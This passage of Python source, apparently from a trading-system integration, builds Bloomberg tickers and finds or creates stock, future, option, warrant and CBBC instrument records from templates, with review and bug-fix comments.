        if insMic in ('XHKG', 'XHKF'):
            priceSource = 'Bloomberg_5PM'
        else:
            priceSource = 'EDD_OTC'
    else:
        priceSource = 'EDD_OTC'
    if priceSource != '':
        _setInsAddInfoIfEmpty(acm_ins, 'Snaps Pce Source', 'Snaps_Pce_Source', priceSource)
    if insDesc.strip() != '':
        _setInsAddInfoIfEmpty(acm_ins, 'Ins Description', 'Ins_Description', insDesc)
    if localcode != '':
        _setInsAddInfoIfEmpty(acm_ins, 'Local Exchange Code', 'Local_Exchange_Code', localcode)
    if insName != '':
        _setInsAddInfoIfEmpty(acm_ins, 'Ins Short Name', 'Ins_Short_Name', insName)
    if insType in ('OPTION', 'FUTURE'):
        # Commodity code: prefer the underlying market id, else the first
        # LEN_COMDY_CODE characters of the local exchange code.
        comdycode = ''  # FIX: was unbound when both sources were empty
        if insUnderlying_mktId != '':
            comdycode = insUnderlying_mktId
        elif localcode != '':
            if len(localcode) >= LEN_COMDY_CODE:
                comdycode = localcode[0:LEN_COMDY_CODE]
            else:
                comdycode = localcode
        if comdycode != '':
            _setInsAddInfoIfEmpty(acm_ins, 'Commodity Code', 'Commodity_Code', comdycode)
    if insType == 'STOCK':
        # Stamp duty flag is only created when absent; a blank existing
        # value is left untouched (matches the original behaviour).
        _setInsAddInfoIfEmpty(acm_ins, 'SUBJ_TO_STAMP_DUTY', 'SUBJ_TO_STAMP_DUTY', "Yes", set_if_blank=False)
'''
def createEquityIndexInstr(insCcy, insMic, insDesc, insName, localcode):
insid = ''
prodId = localcode + '@' + insMic
#print prodId
insTemplateId = 'Template EquityIndex'
ins_template = acm.FInstrument[insTemplateId]
ins_new = ins_template.Clone()
ins_new.Name(prodId)
ins_new.Currency(insCcy)
ins_new.Commit()
# Create Stock Additional Infos
CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode)
# Create BB_TICKER alias
bb_ticker = localcode + ' Index'
if bb_ticker != '':
createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
insid = ins_new.Name()
return insid
'''
'''
def map_bb_exch_code(insCcy):
bb_exch_code = ''
if insCcy == 'HKD':
bb_exch_code = 'HK'
elif insCcy in ('SGD'):
bb_exch_code = 'SP'
return bb_exch_code
'''
def map_bb_exch_code(mic):
    """Map a MIC exchange code to its Bloomberg exchange code.

    XHKG/XHKF -> 'HK', XSGD -> 'SP', anything else -> ''.
    """
    if mic in ('XHKG', 'XHKF'):
        return 'HK'
    # FIX: the original used `mic in ('XSGD')` -- parentheses around a lone
    # string are not a tuple, so this was a substring test ('SGD', 'X' and
    # '' all matched).  A one-element tuple restores exact matching.
    if mic in ('XSGD',):
        return 'SP'
    return ''
def getInsidByBBTicker(bb_ticker):
    """Return the insid of the instrument named *bb_ticker*, or '' if absent."""
    found = ael.Instrument[bb_ticker]
    return found.insid.strip() if found != None else ''
def getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut='CALL', insStrikePrice=0):
    """Build a concrete BB_TICKER from the placeholder ticker stored on a
    template instrument.

    The template's BB_TICKER alias carries placeholders that are replaced:
      * 'my'        -> futures month code + last digit of the 2-digit year
      * 'mm/dd/yy'  -> option expiry rendered via %m/%d/%Y
      * '[e]'       -> 'C' or 'P' (call/put)
      * '[x]'       -> strike: integer for INDEX underlyings, 2 d.p. otherwise

    Returns '' for any *insType* other than FUTURE/OPTION.
    """
    ins_template = acm.FInstrument[insTemplateId]
    # Read the placeholder ticker from the template's BB_TICKER alias.
    bb_ticker = ''
    for aliase in ins_template.Aliases():
        if aliase.Type().Name() == 'BB_TICKER':
            bb_ticker = aliase.Alias()
    if insType == 'FUTURE':
        # getYear returns a 2-char YY string; only its last digit is used.
        yy = str(getYear('Future/Forward', insMaturity))
        bb_ticker = bb_ticker.replace('my', getMonthCode('Future/Forward', False, insMaturity)+yy[1:2])
    elif insType == 'OPTION':
        bb_ticker = bb_ticker.replace('mm/dd/yy', ael.date(insMaturity).to_string('%m/%d/%Y'))
        if insCallPut == 'CALL' or insCallPut == 'C':
            bb_ticker = bb_ticker.replace('[e]', 'C')
        else:
            bb_ticker = bb_ticker.replace('[e]', 'P')
        if insULType == 'INDEX':
            # Index option strikes are rendered without decimals.
            bb_ticker = bb_ticker.replace('[x]', str(int(float(insStrikePrice))))
        else:
            bb_ticker = bb_ticker.replace('[x]', str('{0:.2f}'.format(insStrikePrice)))
    else:
        bb_ticker = ''
    return bb_ticker
def formatBBTicker(mic, insCcy, insType, localcode, insMaturity=None, underlying_insid='', insPointValue=0, insULType='', insCallPut='CALL', insStrikePrice='0'):
    """Compose the Bloomberg ticker (BB_TICKER) for an instrument.

    Supported *insType* values: STOCK/WARRANT/CBBC (cash-style ticker),
    FUTURE and OPTION (built from a template for INDEX underlyings, or
    from the underlying's local exchange code for STOCK underlyings).
    Returns '' when no ticker can be derived.

    Fix over the previous implementation: ``insType in ('FUTURE')`` and
    ``insType in ('OPTION')`` were substring tests against a plain string
    (e.g. insType '' or 'FUT' matched); one-element tuples restore exact
    matching.
    """
    bb_ticker = ''
    #print insType
    if insType in ('STOCK','WARRANT','CBBC'):
        # Cash instruments: '<localcode> <bb exchange> Equity'.
        #bb_exch_code = map_bb_exch_code(insCcy)
        #print mic
        bb_exch_code = map_bb_exch_code(mic)
        bb_db_code = 'Equity'
        bb_ticker = localcode + ' ' + bb_exch_code + ' ' + bb_db_code
    elif insType in ('FUTURE',):
        if insULType == 'INDEX':
            # Index futures are named from their generic template.
            insTemplateId = getIndexFutureTemplate(underlying_insid, insPointValue)
            if insTemplateId != '':
                bb_ticker = getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut, insStrikePrice)
        elif insULType == 'STOCK':
            acm_und_ins = acm.FInstrument[underlying_insid]
            if acm_und_ins != None:
                #bb_exch_code = map_bb_exch_code(acm_und_ins.Currency().Name().strip())
                bb_exch_code = map_bb_exch_code(acm_und_ins.AdditionalInfo().MIC().strip())
                bb_db_code = 'Equity'
                yy = str(getYear('Future/Forward', insMaturity))
                if acm_und_ins.AdditionalInfo().Local_Exchange_Code() != None:
                    # e.g. '<code>=<month code><year digit> HK Equity'
                    bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + '=' + getMonthCode('Future/Forward', False, insMaturity) + yy[1:2] + ' ' + bb_exch_code + ' ' + bb_db_code
    elif insType in ('OPTION',):
        if insULType == 'INDEX':
            # Index options are named from their generic template.
            insTemplateId = getIndexOptionTemplate(underlying_insid, insPointValue)
            if insTemplateId != '':
                bb_ticker = getTemplateBBTicker(insTemplateId, insType, insULType, insMaturity, insCallPut, insStrikePrice)
        elif insULType == 'STOCK':
            acm_und_ins = acm.FInstrument[underlying_insid]
            if acm_und_ins != None:
                #bb_exch_code = map_bb_exch_code(acm_und_ins.Currency().Name().strip())
                bb_exch_code = map_bb_exch_code(acm_und_ins.AdditionalInfo().MIC().strip())
                bb_db_code = 'Equity'
                if acm_und_ins.AdditionalInfo().Local_Exchange_Code() != None:
                    if insCallPut == 'CALL' or insCallPut == 'C':
                        CP = 'C'
                    else:
                        CP = 'P'
                    # Special case: HKEX stock 939 uses the 'S' suffix ticker.
                    if acm_und_ins.AdditionalInfo().MIC().strip() == 'XHKG' and acm_und_ins.AdditionalInfo().Local_Exchange_Code().strip() == '939':
                        bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + 'S ' + bb_exch_code + ' ' + ael.date(insMaturity).to_string('%m/%d/%Y') + ' ' + CP + str(insStrikePrice) + ' ' + bb_db_code
                    else:
                        bb_ticker = acm_und_ins.AdditionalInfo().Local_Exchange_Code() + ' ' + bb_exch_code + ' ' + ael.date(insMaturity).to_string('%m/%d/%Y') + ' ' + CP + str(insStrikePrice) + ' ' + bb_db_code
    return bb_ticker
def createStockInstr(insCcy, insMic, insDesc, insName, localcode):
    """Find or create a stock (or ETF) instrument and return its insid.

    The Bloomberg ticker is derived first; if an instrument with that
    ticker already exists, its additional infos/alias are backfilled and
    its insid is returned.  Otherwise a new instrument is cloned from
    'Template Stock' (or 'Template ETF' for qualifying XHKG codes).
    Returns '' when no ticker can be built.
    """
    insid = ''
    #print 'A'
    '''
    bb_ticker = ''
    bb_exch_code = map_bb_exch_code(insCcy)
    bb_db_code = 'Equity'
    bb_ticker = localcode + ' ' + bb_exch_code + ' ' + bb_db_code
    '''
    #bb_ticker = formatBBTicker(insCcy, 'STOCK', localcode)
    bb_ticker = formatBBTicker(insMic, insCcy, 'STOCK', localcode)
    if bb_ticker == '':
        return insid
    # Reuse an existing instrument carrying this ticker, backfilling data.
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'STOCK', '')
        if bb_ticker != '':
            # Create BB_TICKER alias
            createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    #prodId = localcode + '@' + insMic
    prodId = bb_ticker
    # Differentiate ETF and Stock (4May2016)
    # NOTE(review): IsETF_from_Exchange is defined elsewhere in the project;
    # presumably it queries the exchange's ETF list -- confirm its source.
    if insMic == 'XHKG' and IsETF_from_Exchange(localcode):
        insTemplateId = 'Template ETF'
    else:
        insTemplateId = 'Template Stock'
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Name(prodId)
    ins_new.Currency(insCcy)
    ins_new.Commit()
    # Create Stock Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'STOCK', '')
    if bb_ticker != '':
        # Create BB_TICKER alias
        createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
    insid = ins_new.Name()
    return insid
def createStockFutureInstr(insCcy, insMic, insDesc, localcode, insMaturity, insPointValue, insName, underlying_insid, insULType, insUnderlying_mktId, insDeliveryType):
    """Find or create a single-stock future instrument; return its insid.

    Derives the Bloomberg ticker first; an existing instrument with that
    ticker is reused (with add-infos/alias backfilled).  Otherwise a new
    instrument is cloned from 'Template Future' with the given expiry,
    contract size, currency, underlying and settlement type.
    Returns '' when no ticker can be built.
    """
    insid = ''
    #prodId = localcode + '@' + insMic
    #print 'CC', insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType
    #def formatBBTicker(insCcy, insType, localcode, insMaturity=None, underlying_insid='', insPointValue=0, insULType='', insCallPut='CALL', insStrikePrice='0'):
    #bb_ticker = formatBBTicker(insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
    bb_ticker = formatBBTicker(insMic, insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
    if bb_ticker == '':
        return insid
    # Reuse an existing instrument carrying this ticker.
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
        if bb_ticker != '':
            # Create BB_TICKER alias
            createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    prodId = bb_ticker
    insTemplateId = 'Template Future'
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(prodId)
    ins_new.ExpiryDate(insMaturity)
    ins_new.ContractSize(float(insPointValue))
    ins_new.Currency(insCcy)
    # NOTE(review): attribute assignment rather than the setter-call style
    # (ins_new.Underlying(...)) used for the other fields, yet the next
    # line calls ins_new.Underlying() -- confirm this works as intended.
    ins_new.Underlying = acm.FInstrument[underlying_insid]
    # Underlying Type
    insUnderlyingInsType = ins_new.Underlying().InsType()
    ins_new.ValuationGrpChlItem('Listed Equity Future')
    if insDeliveryType.upper() == 'CASH':
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    ins_new.Commit()
    # Create Future Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
    # Create BB_TICKER alias
    if bb_ticker != '':
        createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
    insid = ins_new.Name()
    return insid
def getIndexFutureTemplate(underlying_insid, insPointValue):
    """Return the insid of the generic Future/Forward template whose
    underlying is *underlying_insid* and whose contract size equals
    *insPointValue*; '' when no such template exists.

    Fix over the previous implementation: when the query returned no rows
    the function fell off the end and returned None, while callers compare
    the result against '' -- the no-match case now returns '' explicitly.
    """
    strSql = """
    select i.insid
    from instrument i, instrument ui
    where i.instype = 'Future/Forward'
    and i.generic = 'Yes'
    and i.und_insaddr = ui.insaddr
    and ui.insid = '%s'
    and i.contr_size = %s
    """ % (underlying_insid, insPointValue)
    #print strSql
    rs = ael.asql(strSql)
    columns, buf = rs
    # Return the first matching row.
    for table in buf:
        for row in table:
            return row[0].strip()
    return ''
def createIndexFutureInstr(insCcy, insMic, insDesc, localcode, insMaturity, insPointValue, insName, underlying_insid, insULType, insUnderlying_mktId):
    """Find or create an index future instrument; return its insid.

    Derives the Bloomberg ticker first; an existing instrument with that
    ticker is reused (with add-infos/alias backfilled).  Otherwise a new
    instrument is cloned from the generic index-future template matching
    the underlying and contract size.  Returns '' when no ticker or no
    template can be found.
    """
    insid = ''
    #prodId = localcode + '@' + insMic
    #bb_ticker = formatBBTicker(insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
    bb_ticker = formatBBTicker(insMic, insCcy, 'FUTURE', localcode, insMaturity, underlying_insid, insPointValue, insULType)
    if bb_ticker == '':
        return insid
    # Reuse an existing instrument carrying this ticker.
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
        if bb_ticker != '':
            # Create BB_TICKER alias
            createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    #prodId = localcode + '@' + insMic
    prodId = bb_ticker
    insTemplateId = getIndexFutureTemplate(underlying_insid, insPointValue)
    if insTemplateId == '':
        return insid
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(prodId)
    ins_new.ExpiryDate(insMaturity)
    ins_new.ContractSize(float(insPointValue))
    ins_new.Currency(insCcy)
    # NOTE(review): attribute assignment rather than the setter-call style
    # (ins_new.Underlying(...)) used for the other fields, yet the next
    # line calls ins_new.Underlying() -- confirm this works as intended.
    ins_new.Underlying = acm.FInstrument[underlying_insid]
    # Underlying Type
    insUnderlyingInsType = ins_new.Underlying().InsType()
    ins_new.ValuationGrpChlItem('Listed Index Future')
    # BB_TICKER alias: the template clone already carries an alias record,
    # so the placeholder is overwritten in place before the commit.
    if bb_ticker != '':
        for aliase in ins_new.Aliases():
            if aliase.Type().Name() == 'BB_TICKER':
                aliase.Alias(bb_ticker)
                break
    #if bb_ticker != '':
    #    createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker, True)
    ins_new.Commit()
    # Create Future Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'FUTURE', insUnderlying_mktId)
    insid = ins_new.Name()
    return insid
def createCBBCInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic,
                    insDesc, localcode, insBullBear, insBarrier, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid, insName, ins_underlying_insid, warrantParity):
    """Create (or reuse) a CBBC (Callable Bull/Bear Contract) instrument
    cloned from 'Template CBBC'.

    Returns the instrument insid, or '' when no Bloomberg ticker could be
    derived from the inputs.
    """
    insid = ''
    # The Bloomberg ticker doubles as the new instrument's name.
    bb_ticker = formatBBTicker(insMic, insCcy, 'CBBC', localcode, insMaturity, ins_underlying_insid, insPointValue)
    if bb_ticker == '':
        return insid
    prodId = bb_ticker
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        # Instrument already booked: just refresh additional infos and alias.
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'CBBC', '')
        createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    insTemplateId = 'Template CBBC'
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Name(prodId)
    ins_new.Underlying(ins_underlying_insid)
    ins_new.ExpiryDate(insMaturity)
    ins_new.Currency(insCcy)
    insOptionType = insOptionType.upper()
    # Default the option type from the bull/bear flag when not supplied:
    # BULL contracts behave like calls, BEAR like puts.
    if insOptionType.strip() == '':
        if insBullBear == 'BULL':
            insOptionType = 'CALL'
        else:
            insOptionType = 'PUT'
    if insOptionType == 'CALL' or insOptionType == 'C':
        ins_new.IsCallOption(True)
    else:
        ins_new.IsCallOption(False)
    if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
        ins_new.ExerciseType('European')
    else:
        ins_new.ExerciseType('American')
    if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    # Contract size is the inverse of the warrant parity (entitlement ratio).
    ins_new.ContractSize(1.0 / float(warrantParity))
    ins_new.StrikeCurrency(insCcy)
    ins_new.StrikePrice(float(insStrike))
    ins_new.ValuationGrpChlItem('CBBC Warrant')
    ins_new.Barrier(float(insBarrier))
    if insIssueSize != '':
        ins_new.TotalIssued(float(insIssueSize))
    if insIssueDate != '':
        ins_new.IssueDay(insIssueDate)
    insBarrierType = insBarrierType.upper()
    for exotic in ins_new.Exotics():
        if insBarrierType == '':
            # No explicit barrier type: infer the knock-out direction from the
            # bull/bear flag (bull-calls knock out above, everything else below).
            if insBullBear == 'BULL' and (insOptionType == 'CALL' or insOptionType == 'C'):
                exotic.BarrierOptionType('Up & Out')
            else:
                exotic.BarrierOptionType('Down & Out')
        else:
            if insBarrierType == 'UPANDOUT':
                exotic.BarrierOptionType('Up & Out')
            elif insBarrierType == 'DOWNANDOUT':
                exotic.BarrierOptionType('Down & Out')
            elif insBarrierType == 'DOWNANDIN':
                exotic.BarrierOptionType('Down & In')
            else:
                # BUGFIX: was 'UP & In' — normalised casing to match the other
                # BarrierOptionType values ('Up & Out', 'Down & In', ...).
                exotic.BarrierOptionType('Up & In')
    if issuer_ptyid != '':
        ins_new.Issuer(issuer_ptyid)
    ins_new.Commit()
    # Create Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'CBBC', '')
    if bb_ticker != '':
        createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
    insid = ins_new.Name()
    return insid
def createWarrantInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike,
                        insMic, insDesc, localcode, insIssueSize, insIssueDate, issuer_ptyid, insName, ins_underlying_insid, warrantParity):
    """Create (or reuse) a listed warrant instrument cloned from
    'Template Warrant'.

    Returns the instrument insid, or '' when no Bloomberg ticker could
    be derived from the inputs.
    """
    bb_ticker = formatBBTicker(insMic, insCcy, 'WARRANT', localcode, insMaturity, ins_underlying_insid, insPointValue)
    if bb_ticker == '':
        return ''
    existing_insid = getInsidByBBTicker(bb_ticker)
    if existing_insid != '':
        # Instrument already booked: refresh additional infos and alias only.
        CreateInsAdditionalInfo(existing_insid, insMic, insDesc, insName, localcode, 'WARRANT', '')
        createInstrumentAlias(existing_insid, 'BB_TICKER', bb_ticker)
        return existing_insid
    # Clone the template; the Bloomberg ticker becomes the instrument name.
    warrant = acm.FInstrument['Template Warrant'].Clone()
    warrant.Name(bb_ticker)
    warrant.Underlying(ins_underlying_insid)
    warrant.ExpiryDate(insMaturity)
    warrant.Currency(insCcy)
    warrant.IsCallOption(insOptionType.upper() in ('CALL', 'C'))
    if insExecType.upper() in ('EUROPEAN', 'E'):
        warrant.ExerciseType('European')
    else:
        warrant.ExerciseType('American')
    if insDeliveryType.upper() == 'CASH':
        warrant.SettlementType('Cash')
    else:
        warrant.SettlementType('Physical Delivery')
    if insIssueSize != '':
        warrant.TotalIssued(float(insIssueSize))
    if insIssueDate != '':
        warrant.IssueDay(insIssueDate)
    # Contract size is the inverse of the warrant parity (entitlement ratio).
    warrant.ContractSize(1.0 / float(warrantParity))
    warrant.StrikeCurrency(insCcy)
    warrant.StrikePrice(float(insStrike))
    warrant.ValuationGrpChlItem('Listed Warrant')
    if issuer_ptyid != '':
        warrant.Issuer(issuer_ptyid)
    warrant.Commit()
    # Persist the descriptive additional infos and the BB_TICKER alias.
    CreateInsAdditionalInfo(warrant.Name(), insMic, insDesc, insName, localcode, 'WARRANT', '')
    if bb_ticker != '':
        createInstrumentAlias(warrant.Name(), 'BB_TICKER', bb_ticker)
    return warrant.Name()
def getIndexOptionTemplate(underlying_insid, insPointValue):
    """Look up the insid of a *generic* Option template whose underlying
    and contract size match the given values.

    Returns '' when no such template instrument exists.
    """
    strSql = """
        select i.insid
        from instrument i, instrument ui
        where i.instype = 'Option'
        and i.generic = 'Yes'
        and i.und_insaddr = ui.insaddr
        and ui.insid = '%s'
        and i.contr_size = %s
        """ % (underlying_insid, insPointValue)
    _columns, result_sets = ael.asql(strSql)
    template_insid = ''
    # asql returns a list of result sets; keep the last matching row (if any).
    for result_set in result_sets:
        for record in result_set:
            template_insid = record[0].strip()
    return template_insid
def createIndexOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
    """Create (or reuse) a listed index-option instrument cloned from the
    matching generic template.

    Returns the instrument insid, or '' when no Bloomberg ticker could be
    derived or no generic template matches the underlying/contract size.
    """
    insid = ''
    # The Bloomberg ticker doubles as the new instrument's name.
    bb_ticker = formatBBTicker(insMic, insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
    if bb_ticker == '':
        return insid
    prodId = bb_ticker
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        # Instrument already booked: just refresh additional infos and alias.
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
        createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    insTemplateId = getIndexOptionTemplate(ins_underlying_insid, insPointValue)
    if insTemplateId == '':
        return insid
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(prodId)
    ins_new.Underlying(ins_underlying_insid)
    ins_new.ExpiryDate(insMaturity)
    ins_new.Currency(insCcy)
    if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
        ins_new.IsCallOption(True)
    else:
        ins_new.IsCallOption(False)
    if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
        ins_new.ExerciseType('European')
    else:
        ins_new.ExerciseType('American')
    if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    ins_new.StrikeCurrency(insCcy)
    ins_new.StrikePrice(float(insStrike))
    ins_new.ContractSize(float(insPointValue))
    ins_new.ValuationGrpChlItem('Listed Index Option')
    # Update the BB_TICKER alias inherited from the template, if present.
    # (Two superseded alias/ticker code paths that survived as no-op
    # triple-quoted strings have been removed.)
    if bb_ticker != '':
        for aliase in ins_new.Aliases():
            if aliase.Type().Name() == 'BB_TICKER':
                aliase.Alias(bb_ticker)
                break
    ins_new.Commit()
    # Create Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
    insid = ins_new.Name()
    return insid
def createStockOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, localcode, insName, insULType, ins_underlying_insid, insUnderlying_mktId):
    """Create (or reuse) a listed equity (stock) option instrument cloned
    from 'Template Option'.

    Returns the instrument insid, or '' when no Bloomberg ticker could be
    derived from the inputs.
    """
    insid = ''
    # The Bloomberg ticker doubles as the new instrument's name.
    bb_ticker = formatBBTicker(insMic, insCcy, 'OPTION', localcode, insMaturity, ins_underlying_insid, insPointValue, insULType, insOptionType, insStrike)
    if bb_ticker == '':
        return insid
    prodId = bb_ticker
    insid = getInsidByBBTicker(bb_ticker)
    if insid != '':
        # Instrument already booked: just refresh additional infos and alias.
        CreateInsAdditionalInfo(insid, insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
        createInstrumentAlias(insid, 'BB_TICKER', bb_ticker)
        return insid
    insTemplateId = 'Template Option'
    ins_template = acm.FInstrument[insTemplateId]
    ins_new = ins_template.Clone()
    ins_new.Generic(False)
    ins_new.Name(prodId)
    ins_new.Underlying(ins_underlying_insid)
    ins_new.ExpiryDate(insMaturity)
    ins_new.Currency(insCcy)
    if insOptionType.upper() == 'CALL' or insOptionType.upper() == 'C':
        ins_new.IsCallOption(True)
    else:
        ins_new.IsCallOption(False)
    if insExecType.upper() == 'EUROPEAN' or insExecType.upper() == 'E':
        ins_new.ExerciseType('European')
    else:
        ins_new.ExerciseType('American')
    if insDeliveryType.upper() == 'CASH' or insDeliveryType.upper() == 'C':
        ins_new.SettlementType('Cash')
    else:
        ins_new.SettlementType('Physical Delivery')
    ins_new.StrikeCurrency(insCcy)
    ins_new.StrikePrice(float(insStrike))
    ins_new.ContractSize(float(insPointValue))
    ins_new.ValuationGrpChlItem('Listed Equity Option')
    ins_new.Commit()
    # Create Additional Infos
    CreateInsAdditionalInfo(ins_new.Name(), insMic, insDesc, insName, localcode, 'OPTION', insUnderlying_mktId)
    if bb_ticker != '':
        createInstrumentAlias(ins_new.Name(), 'BB_TICKER', bb_ticker)
    insid = ins_new.Name()
    return insid
def getInstrument(tradeId, way, qty, price, insLocalCode,
                    trdCcy, insMic, insCcy, insDesc, insProdType,
                    insMaturity, insPointValue, insStrike, insOptionType,
                    insExecType, insBullBear, insBarrier, insOtc, insDeliveryType,
                    insUlLocalCode, insULProdType, insULMic, insULCcy, insULDesc,
                    trdChannel, insIssueSize, insIssueDate, insBarrierType, issuer_ptyid,
                    insName, insULName, insUnderlying_mktId, warrantParity,
                    mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval,
                    fo_system, new_arr_ins, errdict):
    """Resolve (or create) the instrument for an incoming FO trade.

    Dispatches on insProdType (STOCK / FUTURE / OPTION / WARRANT / CBBC):
    looks the instrument up by local-code mapping (or, for MSSD futures and
    index options, by individual attributes), creating the underlying and
    then the derivative itself when missing. Newly created insids are
    appended to new_arr_ins (mutated in place).

    Returns a (trd_insid, newIns) tuple: the resolved insid ('' on failure)
    and True when the instrument was freshly created by this call.
    """
    newIns = False
    trd_insid = ''
    # Normalise the free-text classification fields once up front.
    insProdType = insProdType.upper()
    insULProdType = insULProdType.upper()
    insOptionType = insOptionType.upper()
    insExecType = insExecType.upper()
    insBullBear = insBullBear.upper()
    insOtc = insOtc.upper()
    insDeliveryType = insDeliveryType.upper()
    if insProdType == 'STOCK':
        # --- Cash equity: create the stock itself when unmapped. ---
        #print 'louis999'
        ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        if ins_insid == '':
            ins_new_insid = createStockInstr(insCcy, insMic, insDesc, insName, insLocalCode)
            if ins_new_insid != '':
                trd_insid = ins_new_insid
                new_arr_ins.append(ins_new_insid)
                newIns = True
        else:
            # Existing instrument: refresh additional infos and BB ticker alias.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
            #bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
            bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
            if bb_ticker != '':
                createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
            trd_insid = ins_insid
            newIns = False
    elif insProdType == 'FUTURE':
        # --- Futures: MSSD feeds are matched on individual attributes,
        # everything else on the local-code mapping. ---
        #print 'AAA'
        if fo_system == 'MSSD':
            #print 'BBB'
            ins_insid = getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval)
            #print 'CCC'
        else:
            ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        #print 'louis889', insProdType, ins_insid
        if ins_insid == '':
            # get Underlying
            ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
            if ins_underlying_insid == '':
                if insULProdType == 'STOCK':
                    ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                elif insULProdType == 'INDEX':
                    # Index underlyings are not auto-created (creation disabled).
                    ins_underlying_insid = ''
                    #ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                if ins_underlying_insid != '':
                    new_arr_ins.append(ins_underlying_insid)
            else:
                # Existing underlying: refresh its additional infos and alias.
                acm_ins = acm.FInstrument[ins_underlying_insid]
                CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
                #ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
                ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
                if ul_bb_ticker != '':
                    createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
            # Create Future
            if ins_underlying_insid != '':
                ins_new_insid = ''
                if insULProdType == 'STOCK':
                    ins_new_insid = createStockFutureInstr(insCcy, insMic, insDesc, insLocalCode, insMaturity, insPointValue, insName, ins_underlying_insid, insULProdType, insUnderlying_mktId, insDeliveryType)
                elif insULProdType == 'INDEX':
